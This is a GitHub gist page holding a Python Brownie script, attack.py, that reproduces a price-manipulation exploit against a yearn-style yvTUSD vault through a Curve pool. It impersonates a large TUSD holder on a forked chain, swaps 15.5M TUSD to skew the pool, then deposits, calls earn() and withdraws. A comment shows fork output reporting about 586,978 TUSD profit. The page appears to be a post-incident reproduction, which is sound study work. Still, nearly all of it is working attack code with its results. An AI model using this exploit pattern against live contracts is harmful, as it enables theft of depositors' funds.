Skip to content

Instantly share code, notes, and snippets.

@banteg

banteg/attack.py Secret

Last active December 29, 2020 10:37
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save banteg/b26ca556308b58d2643299dd02dbb54c to your computer and use it in GitHub Desktop.
Save banteg/b26ca556308b58d2643299dd02dbb54c to your computer and use it in GitHub Desktop.
from brownie import accounts, interface, Contract
def main():
tusd = interface.ERC20('0x0000000000085d4780B73119b644AE5ecd22b376')
yvtusd = Contract('0x37d19d1c4E1fa9DC47bD1eA12f742a0887eDa74a')
curve = Contract('0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51')
dai = interface.ERC20('0x6B175474E89094C44Da98b954EedeAC495271d0F')
# exploit parameters
swap_amt = Wei(15.5e24) # 15.5M TUSD
earn_amt = Wei(5.5e24) # 5.5M TUSD
# a user with tons of tusd (makerdao tusd join adapter)
hacker = accounts.at('0x4454aF7C8bb9463203b66C816220D41ED7837f44', force=True)
before = tusd.balanceOf(hacker).to('ether')
# give approvals
tusd.approve(curve, 2**256-1, {'from': hacker})
tusd.approve(yvtusd, 2**256-1, {'from': hacker})
dai.approve(curve, 2**256-1, {'from': hacker})
# run the exploit
curve.exchange_underlying(3, 0, swap_amt, 0, {'from': hacker})
yvtusd.deposit(earn_amt, {'from': hacker})
yvtusd.earn({'from': hacker})
curve.exchange_underlying(0, 3, dai.balanceOf(hacker), 0, {'from': hacker})
yvtusd.withdrawAll({'from': hacker})
after = tusd.balanceOf(hacker).to('ether')
print('profit', after - before)
@banteg
Copy link
Author

banteg commented Oct 29, 2020

ganache-cli --fork http://127.0.0.1:8545@11154016 --gasLimit 10000000 --port 7545
swap amt 15500000.000000000000000000
earn amt 5500000.000000000000000000
before 57045045.955399413461175956
after 57632024.251783526608011680
profit 586978.296384113146835724

@raddy
Copy link

raddy commented Nov 8, 2020

Is interface your own custom solidity interface for wrapping ERC20?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment